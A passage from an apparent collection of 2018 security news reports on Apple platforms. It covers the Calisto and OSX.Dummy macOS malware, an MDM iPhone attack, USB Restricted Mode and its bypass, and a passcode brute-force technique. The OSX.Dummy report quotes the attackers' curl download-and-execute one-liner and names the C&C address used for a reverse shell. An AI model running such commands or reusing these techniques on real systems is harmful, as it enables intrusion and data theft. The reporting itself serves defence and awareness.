Snapchat told several news websites that the leak is a result of an iOS update made in May that exposed a “small amount” of its source code. The issue has been addressed and the company says the incident has not compromised its application and had no impact on the Snapchat community.

Messages posted on Twitter by the individuals who appear to be behind the source code leak suggest that they are expecting some sort of “reward” from Snapchat. It’s not uncommon for researchers who find vulnerabilities to quarrel with vendors over the impact or severity of a bug. However, Snapchat appears to be the target of an extortion attempt considering that the hackers say they will continue posting the code.

At least two individuals, allegedly based in Pakistan and France, appear to be involved in the incident. They have been posting messages written in Arabic and English on Twitter.

Snapchat hacker

While Snap says the code posted online has been removed, at least two forks (i.e. copies) exist on GitHub and they suggest that the code has been online since May 24. A few hours before this article was published, the original hackers also re-uploaded the code to GitHub.

Snapchat does have an official bug bounty program powered by HackerOne and the company has been known to award significant rewards for critical vulnerabilities. Last year, two researchers earned a total of $20,000 for finding exposed Jenkins instances that allowed arbitrary code execution and provided access to sensitive data.

Calisto Trojan for macOS

31.7.2018 Kaspersky Apple
The first member of the Proton malware family?
An interesting aspect of studying a particular piece of malware is tracing its evolution and observing how the creators gradually add new monetization or entrenchment techniques. Also of interest are developmental prototypes that have had limited distribution or not even occurred in the wild. We recently came across one such sample: a macOS backdoor that we named Calisto.

The malware was uploaded to VirusTotal way back in 2016, most likely the same year it was created. But for two whole years, until May 2018, Calisto remained off the radar of antivirus solutions, with the first detections on VT appearing only recently.

Malware for macOS is not that common, and this sample was found to contain some suspiciously familiar features. So we decided to unpick Calisto to see what it is and why its development was stopped (or was it?).

We have no reliable information about how the backdoor was distributed. The Calisto installation file is an unsigned DMG image under the guise of Intego’s security solution for Mac. Interestingly, Calisto’s authors chose the ninth version of the program as a cover which is still relevant.

For illustrative purposes, let’s compare the malware file with the version of Mac Internet Security X9 downloaded from the official site.

Backdoor Intego Mac Internet Security 2018
Unsigned Signed by Intego

It looks fairly convincing. The user is unlikely to notice the difference, especially if he has not used the app before.

As soon as it starts, the application presents us with a sham license agreement. The text differs slightly from the Intego’s one — perhaps the cybercriminals took it from an earlier version of the product.

Next, the “antivirus” asks for the user’s login and password, which is completely normal when installing a program able to make changes to the system on macOS.

But after receiving the credentials, the program hangs slightly before reporting that an error has occurred and advising the user to download a new installation package from the official site of the antivirus developer.

The technique is simple, but effective. The official version of the program will likely be installed with no problems, and the error will soon be forgotten. Meanwhile, in the background, Calisto will be calmly getting on with its mission.

Analysis of the Trojan
With SIP enabled
Calisto’s activity on a computer with SIP (System Integrity Protection) enabled is rather limited. Announced by Apple back in 2015 alongside the release of OSX El Capitan, SIP is designed to protect critical system files from being modified — even by a user with root permissions. Calisto was developed in 2016 or earlier, and it seems that its creators simply didn’t take into account the then-new technology. However, many users still disable SIP for various reasons; we categorically advise against doing so.

Calisto’s activity can be investigated using its child processes log and decompiled code:

Log of commands executed by the Trojan during its operation

Hardcoded commands inside the Calisto sample

We can see that the Trojan uses a hidden directory named .calisto to store:

Keychain storage data
Data extracted from the user login/password window
Information about the network connection
Data from Google Chrome: history, bookmarks, cookies
Recall that Keychain stores passwords/tokens saved by the user, including ones saved in Safari. The encryption key for the storage is the user’s password.

Next, if SIP is enabled, an error occurs when the Trojan attempts to modify system files. This violates the operational logic of the Trojan, causing it to stop.

Error message

With SIP disabled/not available
Observing Calisto with SIP disabled is far more interesting. To begin with, Calisto executes the steps from the previous chapter, but as the Trojan is not interrupted by SIP, it then:

Copies itself to /System/Library/ folder
Sets itself to launch automatically on startup
Unmounts and uninstalls its DMG image
Adds itself to Accessibility
Harvests additional information about the system
Enables remote access to the system
Forwards the harvested data to a C&C server
Let’s take a closer look at the malware’s implementation mechanisms.

Adding itself to startup is a classic technique for macOS, and is done by creating a .plist file in the /Library/LaunchAgents/ folder with a link to the malware:

The DMG image is unmounted and uninstalled via the following command:

To extend its capabilities, Calisto adds itself to Accessibility by directly modifying the TCC.db file, which is bad practice and an indicator of malicious activity for the antivirus. On the other hand, this method does not require user interaction.

An important feature of Calisto is getting remote access to the user system. To provide this, it:

Enables remote login
Enables screen sharing
Configures remote login permissions for the user
Allows remote login to all
Enables a hidden “root” account in macOS and sets the password specified in the Trojan code
The commands used for this are:

Note that although the user “root” exists in macOS, it is disabled by default. Interestingly, after a reboot, Calisto again requests user data, but this time waits for the input of the actual root password, which it previously changed itself (root: aGNOStIC7890!!!). This is one indication of the Trojan’s rawness.

At the end, Calisto attempts to transfer all data from the .calisto folder to the cybercriminals’ server. But at the time of our research, the server was no longer responding to requests and seemed to be disabled:

Attempt to contact the C&C server

Extra functions
Static analysis of Calisto revealed unfinished and unused additional functionality:

Loading/unloading of kernel extensions for handling USB devices
Data theft from user directories
Self-destruction together with the OS

Loading/unloading of kernel extensions

Working with user directories

Self-destruction together with the entire system

Connections with Backdoor.OSX.Proton
Conceptually, the Calisto backdoor resembles a member of the Backdoor.OSX.Proton family:

The distribution method is similar: it masquerades as a well-known antivirus (a Backdoor.OSX.Proton was previously distributed under the guise of a Symantec antivirus product)
The Trojan sample contains the line “com.proton.calisto.plist”
Like Backdoor.OSX.Proton, this Trojan is able to steal a great amount of personal data from the user system, including the contents of Keychain
Recall that all known members of the Proton malware family were distributed and discovered in 2017. The Calisto Trojan we detected was created no later than 2016. Assuming that this Trojan was written by the same authors, it could well be one of the very first versions of Backdoor.OSX.Proton or even a prototype. The latter hypothesis is supported by the large number of unused and not fully implemented functions. However, they were missing from later versions of Proton.

To protect against Calisto, Proton, and their analogues:

Always update to the current version of the OS
Never disable SIP
Run only signed software downloaded from trusted sources, such as the App Store
Use antivirus software

DMG image: d7ac1b8113c94567be4a26d214964119
Mach-O executable: 2f38b201f6b368d587323a1bec516e5d

Calisto macOS Backdoor Remained Undetected for Two Years
23.7.2018 securityweek Apple

A recently discovered backdoor targeting macOS systems remained undetected for at least two years, according to security firm Kaspersky Lab.

Dubbed Calisto, the malware was first uploaded to VirusTotal in 2016, likely the same year it was created, but it remained undetected by anti-virus solutions until May 2018, Kaspersky's security researchers say.

The backdoor is being distributed as an unsigned DMG image that masquerades as Intego’s Internet Security X9 for Apple's macOS. A comparison with the legitimate application shows that the threat looks fairly convincing, being likely to trick users, especially those who haven’t encountered the application before.

When launched, the malware displays a fake license agreement that differs only slightly compared to Intego’s legitimate agreement.

Next, Calisto asks for the user login and password but, as soon as the user provides the credentials, it hangs and displays an error message, informing the victim they should download a new installation package from Intego’s official site.

On machines with SIP (System Integrity Protection) enabled, an error occurs when the malware attempts to modify system files and it crashes. Apple introduced SIP in 2015 to protect critical system files from being modified, and it appears that the malware developers didn’t take that into account.

The Trojan uses a hidden directory named .calisto to store keychain storage data, data extracted from the user login/password window, network connection information, and Google Chrome data (history, bookmarks, and cookies).

If SIP is disabled, the malware copies itself to the /System/Library/ folder, sets itself to launch automatically on startup, unmounts and uninstalls its DMG image, adds itself to Accessibility, enables remote access to the system, and harvests additional information about the system and sends all data to the command and control (C&C) server.

The Trojan also includes some unfinished and unused functionality, such as the loading/unloading of kernel extensions for handling USB devices, data theft from user directories, and self-destruction (together with the OS).

Some of Calisto characteristics, Kaspersky says, would bring the malware close to the Backdoor.OSX.Proton family. The threat poses as a well-known antivirus (Proton was disguising as a Symantec product), its code contains the line “com.proton.calisto.plist,” and can steal a lot of personal data from the system, including the contents of Keychain.

The Proton remote access Trojan was discovered in 2017. It was being advertised as “a professional FUD surveillance and control solution” that could provide complete remote control of infected machines and could steal anything from credit card information to keystrokes and screenshots.

“The Calisto Trojan we detected was created no later than 2016. Assuming that this Trojan was written by the same authors, it could well be one of the very first versions of Backdoor.OSX.Proton or even a prototype. The latter hypothesis is supported by the large number of unused and not fully implemented functions. However, they were missing from later versions of Proton,” Kaspersky concludes.

Experts discovered Calisto macOS Trojan, the first member of Proton RAT family
22.7.2018 securityaffairs  Apple

Security experts from Kaspersky Lab have discovered a precursor of the infamous Proton macOS malware that was named Calisto.
Malware researchers from Kaspersky Lab have discovered a malware, tracked as Calisto, that appears to be to the precursor of the Proton macOS malware.

“We recently came across one such sample: a macOS backdoor that we named Calisto.

The malware was uploaded to VirusTotal way back in 2016, most likely the same year it was created. But for two whole years, until May 2018, Calisto remained off the radar of antivirus solutions, with the first detections on VT appearing only recently.” reads the analysis published by Kaspersky.

“Conceptually, the Calisto backdoor resembles a member of the Backdoor.OSX.Proton family:”

The malicious code seems to have been developed in 2016, while Proton was first spotted in 2017.

According to the experts, the malware was uploaded on VirusTotal in 2016 but none noticed it until May 2018. Kaspersky has no information about the way the threat was propagated, they immediatelly noticed that some features implemented by Calisto were still under development.

The Calisto installation file is an unsigned DMG image under the guise of Intego’s security solution for Mac.

The analysis published by Kaspersky revealed that many features implemented in Proton malware were not present in Calisto.

Proton malware was first discovered in March 2017, threat actors were offering for sale it on an underground hacking forum for a price ranging from $1,200 to $830,000 for the entire project.

A few weeks later the malware was involved in attacks in the wild for the first time, threat actors hacked the website of the HandBrake app and poisoned the official app with it.

In October 2017 attackers distributed the Proton RAT poisoning legitimate applications, such as the popular Elmedia Player and download manager Folx developed by the Elmedia Player.

Both Proton RAT and Calisto are remote access Trojan (RAT) that once infected a system give the attackers full control over it.

Calisto allows remote control of infected Macs, below some of the features it implements:

Enables remote login
Enables screen sharing
Configures remote login permissions for the user
Allows remote login to all
Enables a hidden “root” account in macOS and sets the password specified in the Trojan code
Static analysis conducted by the experts revealed unfinished functionality, including:

Loading/unloading of kernel extensions for handling USB devices
Data theft from user directories
Self-destruction together with the OS
Experts pointed out that Calisto was developed before Apple rolled out the SIP (System Integrity Protection) security mechanism for this reason it is not able to bypass it.

“Calisto’s activity on a computer with SIP (System Integrity Protection) enabled is rather limited. Announced by Apple back in 2015 alongside the release of OSX El Capitan, SIP is designed to protect critical system files from being modified — even by a user with root permissions.” researchers explained. “Calisto was developed in 2016 or earlier, and it seems that its creators simply didn’t take into account the then-new technology. However, many users still disable SIP for various reasons; we categorically advise against doing so.”

This implies that Calisto cannot infect modern macOS versions, anyway below a few recommendations to protect against Calisto, Proton, and similar threats:

Always update to the current version of the OS
Never disable SIP
Run only signed software downloaded from trusted sources, such as the App Store
Use antivirus software
Currently Calisto appears to have been abandoned by its authors.

Attackers Target iPhones Using Open Source MDM Solution
18.7.2018 securityweek  Apple

Recently discovered cyber attacks targeting iPhone users have been using an open source mobile device management (MDM) system to control enrolled devices, Talos reports.

Enrollment of targeted devices could be performed via physical access or social engineering, but Talos could not determine which method the attackers used. As part of a highly targeted campaign, the attackers went to great lengths in their attempt to replace specific apps and intercept user data.

With the use of the MDM solution, the actor deployed five applications to the 13 targeted devices in India. As a result, they were able to steal SMS messages, view the device location, and exfiltrate data. Apple has been informed on the attack and has already acted against the certificates the attackers used.

Talos security researchers discovered that the attackers added features to legitimate apps (including WhatsApp and Telegram) using the BOptions sideloading technique. Then, the MDM was used to deploy the apps onto targeted devices.

The injected malicious code could gather and steal information such as phone number, serial number, location, contacts, user's photos, SMS and Telegram and WhatsApp chat messages.

The malware appears to have been in use since August 2015, logs on the MDM server and the command and control (C&C) server reveal. Based on other information found on these servers, Talos believes that the malware author works out of India.

The two MDM servers used by the attackers are based on the small, open-source project mdm-server. Through MDM, admins can control multiple devices from a single location, can install and remove apps and certificates, lock the device, change password requirements, and more.

The enrollment process, however, requires user interaction at each step, which suggests that social engineering was used as part of the attack. Most likely, users were advised to install the attacker’s certificate to allow enrollment, and the use of a domain such as "ios-certificate-update[.]com" helped them trick users.

The attacker used a certificate issued in September 2017 for an email address located in Russia, which is believed to be a false flag, as the attacker isn’t located in Russia. The certificates are either self-signed or signed by the Comodo certificate authority.

According to Talos, the affected devices, all located in India, include the following models: iPhone 5.4, iPhone 7.2, iPhone 8.1, iPhone 8.2, iPhone 9.3, and iPhone 9.4. The operating system versions include 10.2.1, 10.3.1, 10.3.2, 10.3.3, 11.0, 11.0.3, 11.2.1, 11.2.5, and 11.2.6.

While there’s no information available on how the 13 devices were enrolled in the MDM, the attacker likely tested the solution on their own iPhone, the researchers say.

The attack, however, appears focused on deploying malicious apps onto the compromised devices to steal information. The attacker injected code into applications such as AppsSLoader, Telegram, WhatsApp, PrayTime, and MyApp and then loaded them onto the targeted iPhones.

The malicious Telegram and WhatsApp versions were observed sending the collected information to a server that has been active since August 2015.

“At the time, it is unclear who the targets of the campaign were, who was the perpetrator, or what the exact purpose was. It's very likely the vector for this campaign was simply social engineering - in other words asking the user to click "ok". This type of vector is very difficult to defend against since users can often be tricked into acting against their best interests,” Talos concludes.

Apple Patches KRACK Flaws in Boot Camp
12.7.2018 securityweek  Apple

Apple has released an update for its Boot Camp utility to address vulnerabilities related to the wireless Key Reinstallation Attacks (KRACK) that were disclosed late last year.

A total of 10 KRACK vulnerabilities were disclosed in October 2017, all impacting the Wi-Fi standard itself and rendering all Wi-Fi Protected Access II (WPA2) protocol implementations vulnerable. The new type of attack also impacts industrial networking devices.

An attacker looking to exploit the vulnerabilities would need manipulate replay handshake messages to trick the victim into reinstalling an already-in-use key. An attacker within Wi-Fi range of a victim would then have access to information previously assumed to be safely encrypted.

Vendors raced to patch the flaws, and Apple themselves released a fist set of KRACK-related patches in October last year, for iOS, macOS, tvOS, and watchOS devices. The company also addressed the bugs in Apple Watch and AirPort Base Station Firmware.

Apple is now pushing a fix for Boot Camp, the multi-boot utility included in macOS that allows users install Microsoft Windows operating systems on Intel-based Macs.

With the release of a Wi-Fi Update for Boot Camp 6.4.0 last week, the Cupertino-based tech giant is addressing a total of three KRACK-released flaws, which are tracked as CVE-2017-13077, CVE-2017-13078, and CVE-2017-13080.

By targeting vulnerable devices, an attacker in Wi-Fi range may force nonce reuse in WPA unicast/PTK clients or in WPA multicast/GTK clients, Apple explains in an advisory.

The software update, the company explains, is available for a broad range of machines running Boot Camp, including MacBook (Late 2009 and later), MacBook Pro (Mid 2010 and later), MacBook Air (Late 2010 and later), Mac mini (Mid 2010 and later), iMac (Late 2009 and later), and Mac Pro (Mid 2010 and later).

“A logic issue existed in the handling of state transitions. This was addressed with improved state management,” Apple noted.

Apple Rolls-Out USB Restricted Mode in iOS
12.7.2018 securityweek  Apple

Apple on Monday released patches for various security vulnerabilities in iOS, macOS, tvOS, watchOS, and Safari, as well as for iCloud and iTunes for Windows.

In addition to fixes for 22 issues, the iOS 11.4.1 software update also introduces the long expected USB Restricted Mode, a feature that should boost the security of its platform and improve privacy.

“Starting with iOS 11.4.1, if you use USB accessories with your iPhone, iPad, or iPod touch, or if you connect your device to a Mac or PC, you might need to unlock your device for it to recognize and use the accessory. Your accessory then remains connected, even if your device is subsequently locked,” Apple says.

The new feature should prevent the use of USB devices that connect over the Lightning port to crack the device’s passcode and access user data, should the connection attempt occur one hour after the device was locked.

The new feature can be found in Settings > Face ID (or Touch ID) & Passcode > USB Accessories. Users should leave the toggle disabled to take advantage of USB Restricted Mode.

With the roll-out of this new capability on iOS, it would be more difficult for forensics analysis to access data on a suspect’s devices, as they would only have a one-hour window at their disposal to attempt to crack the available protections.

Once it has kicked in, USB Restricted Mode persists through reboots and even if the device software has been restored via Recovery mode, ElcomSoft’s Oleg Afonin explains.

However, it is possible to reset the USB Restrictive Mode countdown timer if an untrusted USB accessory is connected to the device within the first hour.

The 22 vulnerabilities addressed with the release of iOS 11.4.1 impact CFNetwork, Emoji, Kernel, libxpc, LinkPresentation, WebKit, WebKit Page Loading, and Wi-Fi. WebKit was impacted the most, with 14 vulnerabilities addressed in it.

The addressed issues include unexpected persistence of cookies in Safari, denial of service, elevation of privileges, access to restricted memory, address bar spoofing, arbitrary code execution, unexpected Safari crashes, exfiltration of audio data cross-origin, and sandbox escape.

The new iOS release is available for iPhone 5s and later, iPad Air and later, and iPod touch 6th generation.

Apple also patched 11 security flaws with the release of macOS High Sierra 10.13.6, Security Update 2018-004 Sierra, Security Update 2018-004 El Capitan. The bugs impact AMD, APFS, ATS, CFNetwork, CoreCrypto, DesktopServices, IOGraphics, Kernel, libxpc, and LinkPresentation.

The most important of the issues is CVE-2018-3665, a vulnerability that impacts Intel processors. Dubbed LazyFP and detailed last month, the bug is similar to Meltdown Variant 3a and could be exploited to access floating point unit (FPU) state data, which can contain sensitive information, such as cryptographic keys.

“Systems using Intel Core-based microprocessors may potentially allow a local process to infer data utilizing Lazy FP state restore from another process through a speculative execution side channel,” Apple notes.

The newly released watchOS 4.3.2 resolves a total of 14 vulnerabilities, while tvOS 11.4.1 addresses 18. Apple resolved 16 flaws with the release of Safari 11.1.2, and patched 14 bugs in both iCloud for Windows 7.6 and iTunes 12.8 for Windows.

Just using a $39 device it is possible to defeat new iOS USB Restricted Mode
11.7.2018 securityaffairs Apple

Once USB Restricted Mode is enabled on a device, no data communications occur over the Lightning port, but experts found a way to reset the countdown timer.
Recently Apple released the iOS 11.4.1 that introduced a new security feature, dubbed USB Restricted Mode, designed to protect your devices against USB accessories used by forensics experts and law enforcement agencies to analyze iPhone or iPad.

The USB Restricted Mode was implemented in the latest beta versions of the iOS operating system, it disables the data connection of the iPhone’s Lightning port after a specific interval of time but it doesn’t interrupt the charging process.

Forensics hardware like the ones manufactured by Cellebrite and Grayshift firm will not be able to attempt brute-force attacks via the Lightning port.

Apple USB Restricted Mode feature

While Apple proudly announced its new feature, experts from ElcomSoft have found a way to reset the countdown timer of USB Restricted Mode and bypass the defense mechanism.

The researchers discovered that by directly connecting a USB accessory to the iOS device within an hour after it was last unlocked would reset the 1-hour countdown.

A cheap Apple’s $39 Lightning to USB 3 Camera adapter could be used to bypass the security features, the experts also discovered that it is possible to bypass the USB Restricted Mode by using untrusted Lightning accessories, or those that have not been paired with the iPhone before.

“What we discovered is that iOS will reset the USB Restrictive Mode countdown timer even if one connects the iPhone to an untrusted USB accessory, one that has never been paired to the iPhone before (well, in fact the accessories do not require pairing at all).” reads the post published by ElcomSoft.

“In other words, once the police officer seizes an iPhone, he or she would need to immediately connect that iPhone to a compatible USB accessory to prevent USB Restricted Mode lock after one hour. Importantly, this only helps if the iPhone has still not entered USB Restricted Mode.”

USB Restricted Mode

ElcomSoft researchers are also testing an unofficial and cheap Lightning to USB adapters to bypass the security measure.

According to the experts, the issue could be easily fixed by Apple, it is probably nothing more than an oversight.

The new feature can be enabled from Settings > Face ID (or Touch ID) & Passcode > USB Accessories, by leaving the toggle disabled.

In case you need to immediately activate the feature on the iOS device before the countdown timer ends, just press the Power button five times.

New macOS Malware Targets Crypto-Currency Users
4.7.2018 securityweek Apple

A new piece of macOS malware has been observed being distributed via crypto-currency related Slack or Discord chat groups, security researchers warn.

First detailed late last month, the malware is being distributed by malicious actors who impersonate admins or key people. The actors share small snippets of code with the members of said chat groups, and attempt to convince them into running the code in a terminal.

Upon execution of the code, a malicious binary is downloaded and executed onto the victim’s machine. Although the social engineering trick isn’t as sophisticated, some users apparently fall for it.

The downloaded payload is rather large, at 34MB. As of Friday, the malware wasn’t being detected by any of the 60 anti-virus engines in VirusTotal, Remco Verhoef, ISC Handler and Founder of DutchSec, explains.

The malicious binary is not signed and Gatekeeper would normally flag and block it, but it appears that Apple’s protection measure does not work for files that are executed directly via terminal commands.

The reason the binary is so large is that the author apparently packed in it libraries such as OpenSSL and V8, Objective-See’s Patrick Wardle, who named the malware OSX.Dummy, points out.

When executed on the target machine, the malware first sets the script to be owned as root. When the threat executes sudo to change the file’s permissions, the user is prompted to enter their password in the terminal, and the malware steals it and saves it to /tmp/dumpdummy.

Next, OSX.Dummy sets the script to be executable via chmod +x, moves the script to a new directory, dumps a plist file to /tmp/com.startup.plist and then moves it to the LaunchDaemons directory, sets the owner of the file to root, and then launches the plist launch daemon, for persistency.

At this point, the malware has ensured that the malicious script is automatically executed by the OS whenever the system is rebooted.

The Python script, the security researchers discovered, attempts to connect to 185.243.115[.]230 on port 1337, then “duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the -i flag. In other words, it's setting up an interactive reverse shell,” Wardle notes.

Once the connection to the remote command and control (C&C) server is established, the attacker can execute arbitrary commands on the infected machine, as root.

The malware’s capabilities, however, are limited, and every step of the infection process is rather trivial to detect, Wardle says.

Recently discovered OSX.Dummy mac malware is targeting the cryptocurrency community
30.6.2018 securityaffairs Apple

The former NSA white hat hacker and malware researcher Patrick Wardle analyzed a new mac malware dubbed OSX.Dummy that targets the cryptocurrency community.
The popular experts decided to analyze the malicious code after the security researcher Remco Verhoef (@remco_verhoef) posted an interesting entry to SANS ‘InfoSec Handlers Diary Blog’ titled “Crypto community target of MacOS malware.”
“Previous days we’ve seen multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.” wrote Verhoef.

The Wardle intent was to demonstrate that the Objective-See’s tools can generically thwart this new threat even if it was undetected by all the anti-virus software.

OSX.Dummy malware

Verhoef noticed that the attack was originating within crypto related Slack or Discord chats groups by impersonating admins or key people.

The attackers shared small code snippets like the following one resulting in downloading and executing a malicious binary.

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
Wardle noticed that the malicious binary is not signed, this means it would be blocked by GateKeeper, but attackers overwhelmed this limitation by making the victims to download and run the binary directly via terminal commands.

Wardle conducted a dynamic analysis of the malware using a High Sierra virtual machine with various Objective-See tools installed.

The malware first sets script to be owned as root

# procInfo

monitoring for process events...

process start:
pid: 432
path: /usr/bin/sudo
args: (
then it changes file’s permissions to root by executing the sudo command, but this will require the user to enter the password in the terminal.

The password is saved by the malicious code in the folder /tmp/dumpdummy;

The malware makes a series of operations that allow it to gain persistence through a malicious launch daemon.

The malware sets up the RunAtLoad key to true, this implies that the value of the Program key, /var/root/script.sh, will be automatically executed by the OS whenever the system is rebooted.

The script will attempt to connect to 185[.]243.115.230 on port 1337.
“It then duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the –i flag. In other words, it’s setting up an interactive reverse shell.” explained Wardle.

“If you have a firewall product installed, such as Objective-See’s LuLu, this network activity will be detected”

If the malware successfully connects the C&C server (
), the attacker will be able to arbitrarily execute commands as root on the target system.

Below the key findings of Wardle analysis on the OSX.Dummy:

the infection method is dumb
the massive size of the binary is dumb
the persistence mechanism is lame (and thus also dumb)
the capabilities are rather limited (and thus rather dumb)
it’s trivial to detect at every step (that dumb)
…and finally, the malware saves the user’s password to
“To check if you’re infected run KnockKnock as root (since the malware set’s it components to be readable only by root). Look for an unsigned launch item com.startup.plist executing something named ‘script.sh'” Wardle concluded.

A hacker devised a method to unlock any iPhone and iPad device
25.6.2018 securityaffairs Apple

A security researcher has devised a method to brute force a passcode on every Apple iPhone or iPad, even the up-to-date ones.
Since iOS 8 rolled out in 2014, iPhone and iPad devices are protected with encryption, without providing passcode it is quite impossible to unlock the device.

If the user enters more than 10 times a wrong passcode, the Apple device is wiped.

Now the security researcher Matthew Hickey, co-founder of Hacker House, devised a technique to bypass the limitation of the number of wrong passcodes, even on the latest iOS version (iOS 11.3).

Vimeo ‎@Vimeo

Hacker Fantastic
Apple IOS <= 12 Erase Data bypass, tested heavily with iOS11, brute force 4/6digit PIN's without limits (complex passwords YMMV) https://vimeo.com/276506763 - demo of the exploit in action.

9:16 PM - Jun 22, 2018
178 people are talking about this
Twitter Ads info and privacy
Newer Apple devices implement a hardware-based component that’s isolated from the main processor to provide an extra layer of security, it is also used to keeps count of the number of wrong passcodes the user entered and gets slower at responding with each failed attempt.

Hickey explained that when an iPhone or iPad is plugged in, every keyboard input is managed by the device with the highest priority over other processes on the device.

“If you send your brute-force attack in one long string of inputs, it’ll process all of them, and bypass the erase data feature,” he told ZDNet.

If the attacker sends all the passcodes in one single string by enumerating each code from 0000 to 9999 with no spaces, the iOS gives the keyboard input routine priority over the device’s data-erasing feature. This implies that this trick works only after the device is booted up because there are more routines running.

The attack technique devised by Hickey can be effective against devices protected with six-digit passcodes, but it is slow, running about one passcode between three and five seconds each or over a hundred four-digit codes in an hour it would take weeks to unlock the device.


Hickey reported the bug to Apple but still hasn’t received any reply, he also published a video PoC of its attack.

“I suspect others will find it — or have already found it,” Hickey said.

Apple is implementing a new feature dubbed USB Restricted Mode to improve the security of its device, it is going to lock down the iPhone’s data port to avoid unauthorized access, but experts observed that in this way password-cracking tools used by forensics experts will be no more effective.

macOS' Quick Look Cache May Leak Encrypted Data
21.6.2018 securityweek  Apple

The Quick Look mechanism on macOS, which allows users to check file contents without actually opening the files, may leak information on cached files, even if they reside on encrypted drives or if the files have been deleted.

According to Apple, “Quick Look enables apps like Finder and Mail to display thumbnail images and full-size previews of Keynote, Numbers, Pages, and PDF documents, as well as images and other types of files.”

Quick Look registers the com.apple.quicklook.ThumbnailsAgent XPC service, which creates a thumbnails database and stores it in the /var/folders/.../C/com.apple.QuickLook.thumbnailcache/ directory.

The issue, discovered by Wojciech Regu³a, is that the service creates thumbnails of all supported files located in an accessed folder, regardless of whether the folder resides on an internal or external drive. It does the same for macOS Encrypted HFS+/APFS drives as well.

Because of that, the SQLite database in the com.apple.QuickLook.thumbnailcache/ directory contains previews, metadata and file paths of photos and other files in the accessed folders, depending on the file type and the installed Quick Look plugins.

Said thumbnails, however, are not created only for the files a user has chosen to preview with Quick Look (which automatically results in the service caching file information), but for other files residing in the accessed folders as well.

While the created thumbnails for previewed files are larger, smaller thumbnails are created for the other files, but even those could be used to leak content, Objective-See’s Patrick Wardle suggests.

To demonstrate the bug, Regu³a created a VeraCrypt container, mounted it, and saved an image in it. He also cached it in Quick Look by pressing space on it. Next, he placed a second photo in macOS Encrypted HFS+/APFS drive.

With both images cached, information about the full paths and the file names is stored in the aforementioned database, and the researcher used a modified script to exfiltrate the thumbnails.data file and retrieve the miniatures.

“This technique is known and helps a lot in forensics, but I honestly didn't know about this before. It was the big surprise for me to see that even files stored in encrypted containers may be that cached. Have it on mind when you will be using space to preview photos,” Regu³a notes.

According to Wardle, this behavior “can be replicated in a password-protected encrypted AFPS container.” When creating a file in the container, a thumbnail of the file is created and cached even if the user simply views the container in the UI, without previewing the file, he explains.

Even if the encrypted volume is unmounted, the thumbnail of the file continues to be stored in the temporary directory, meaning that it can be extracted. The cached thumbnails are created for files on USB drives that users insert into their Macs as well.

“Depending on the size of the 'preview' images generated for Finder (and other variables, such as the size of the font used in the file), the contents of the even documents may be discernible from the thumbnail alone,” Wardle notes.

With the main drive encrypted, the cached data remains safe on a powered off system, but it can be revealed to an attacker or law enforcement accessing the system, even if the password-protected encrypted containers have been unmounted.

However, it is possible to clear the Quick Look cache when unmounting a container, using the qlmanage utility. The qlmanage -r cache command should immediately purge the cache, without requiring a system reboot.

Apple USB Restricted Mode feature will make hard for law enforcement to crack devices
18.6.2018 securityaffairs Apple

Apple introduced a new feature in the latest beta versions of iOS, dubbed USB Restricted Mode, to improve the security of a locked device,
Apple is implementing a new feature dubbed USB Restricted Mode to improve the security of its device, it is going to lock down the iPhone’s data port to avoid unauthorized access, but experts observed that in this way password-cracking tools used by forensics experts will be no more effective.

The USB Restricted Mode was implemented in the latest beta versions of the iOS operating system, it disables the data connection of the iPhone’s Lightning port after a specific interval of time but it doesn’t interrupt the charging process.

Any other data transfer would require the user providing the passcode.

Initially, the USB Restricted Mode required a passcode after 7 days.

“The USB Restricted Mode was implemented in the latest beta versions of the iOS operating system, it disables the data connection of the iPhone’s Lightning port after a specific interval of time but it doesn’t interrupt the charging process.” reads a blog post published by ElcomSoft.

Last week Apple provided an update on the new feature confirming that it will require a passcode every hour for the data transfers to continue.

“Apple said it was planning an iPhone software update that would effectively disable the phone’s charging and data port — the opening where users plug in headphones, power cables and adapters — an hour after the phone is locked.” reported the New York Times.

“While a phone can still be charged, a person would first need to enter the phone’s password to transfer data to or from the device using the port.”

Apple USB Restricted Mode feature

The new feature will have a significant impact on forensics investigation conducted using cracking tools such as Cellebrite and Grayshift’s Graykey.

Bruteforcing attacks against the six-digit passcode that protect Apple devices may be a time-consuming operation, it can take up to 22 hours to crack the device.

The USB restricted mode that is enabled by default in the iOS 11.4.1 and iOS 12 betas will interfere with forensics tools.

Anyway, the new feature can be manually disabled.

Experts highlighted that the new feature will also impact the vendors of iPhone peripherals.

Apple Steps Up Encryption to Thwart Police Cracking of iPhones
14.6.2018 securityweek Apple  

Apple said Wednesday it was strengthening encryption on its iPhones to thwart police efforts to unlock handsets without legitimate authorization.

The move by Apple, the latest in an ongoing clash with law enforcement, comes amid reports of growing use of a tool known as GrayKey which can enable police to bypass iPhone security features.

Apple said the new features are not designed to frustrate law enforcement but prevent any bypassing of encryption by good or bad actors.

"At Apple, we put the customer at the center of everything we design," the company said in a statement.

"We're constantly strengthening the security protections in every Apple product to help customers defend against hackers, identity thieves and intrusions into their personal data. We have the greatest respect for law enforcement, and we don't design our security improvements to frustrate their efforts to do their jobs."

Apple said it was working a fix to mitigate the possibility of accessing data from GrayKey or similar tools.

Apple said that it has a team that responds to law enforcement and national security requests 24 hours a day. But the company has been a target of some in law enforcement for rejecting efforts to allow easy access to iPhones.

Two years ago, Apple went to court to block an FBI effort to force it to weaken iPhone encryption on the device of a mass shooter in San Bernardino, California, but officials dropped the case after finding a tool to unlock the phone.

Code Signing Flaw Affects all Mac OS Versions Since 2005
12.6.2018 securityweek  Apple

Okta Rex (Research and Exploitation) researcher Josh Pitts has discovered a method of exploiting the code signing mechanism in MacOS. If exploited, the flaw could allow malicious untrusted code to masquerade as legitimate trusted code and bypass checks by other security software.

Code signing attacks are not new. However, writes Pitts in public disclosure published today, "Unlike some of the prior work, this current vulnerability does not require admin access, does not require JITíing code, or memory corruption to bypass code signing checks. All that is required is a properly formatted Fat/Universal file and code signing checks return valid." Any Mac operating system since the 2005 introduction of OS X Leopard is vulnerable to this flaw.

Code signing works by cryptographically confirming that new code is authentic and not malicious code authored by a bad actor impersonating the original developer. While almost anything, from binaries to PowerShell scripts, can be signed on Windows, on MacOS code signing focuses on the Mach-O binary and application bundles to ensure only trusted code is executed in memory.

